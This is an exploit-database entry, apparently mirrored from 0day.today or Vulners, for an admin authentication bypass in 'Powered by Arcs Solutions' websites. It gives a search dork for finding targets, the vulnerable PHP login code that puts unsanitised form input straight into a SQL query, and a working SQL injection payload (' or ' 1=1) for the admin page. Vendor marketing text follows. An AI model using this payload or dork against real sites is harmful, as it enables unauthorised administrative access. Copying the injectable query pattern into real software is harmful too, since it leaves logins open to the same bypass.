===========================================
Powered by Arcs Solutions Auth Bypass Admin
===========================================
========================================================================
| # Title : Powered by Arcs Solutions Auth Bypass Admin
| # Author : Spy-Q8
| # Date : 28/7/2010
| # email : [email protected]
====================== Exploit By Spy-Q8 ===============================
# Dork : Powered by Arcs Solutions
# Special for: Inj3ct0r.com (Inj3ct0r Exploit Database)
# Exploit :
<?php
session_start();
include ("../include/manager_config.php");
if(isset($_POST['adminloginok']))
{
$usern=$_POST['usern'];
$pass=$_POST['pass'];
$loginquery = "SELECT * FROM ".TABLEPREFIX."_admin WHERE user_login ='$usern' AND user_password = '$pass'";
$result = mysql_query($loginquery);
if (mysql_num_rows($result) >0 )
{
while($row=mysql_fetch_array($result))
{
$session_userlogin=$row['user_login'];
$session_userpass=$row['user_password'];
session_register("session_userlogin");
session_register("session_userpass");
echo"**************************.href='index.php'< /******>";
}
?>
#############################
+] PoC: [path]/admin/index.php
User & Password: ' or ' 1=1
#############################
=================================================================================
[+] Greetz: Dr-LuLa Mr.MLL Diplomatic Hacker Q8 H4x0r nj-sys Mr.al7rbi
# 0day.today [2018-04-06] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation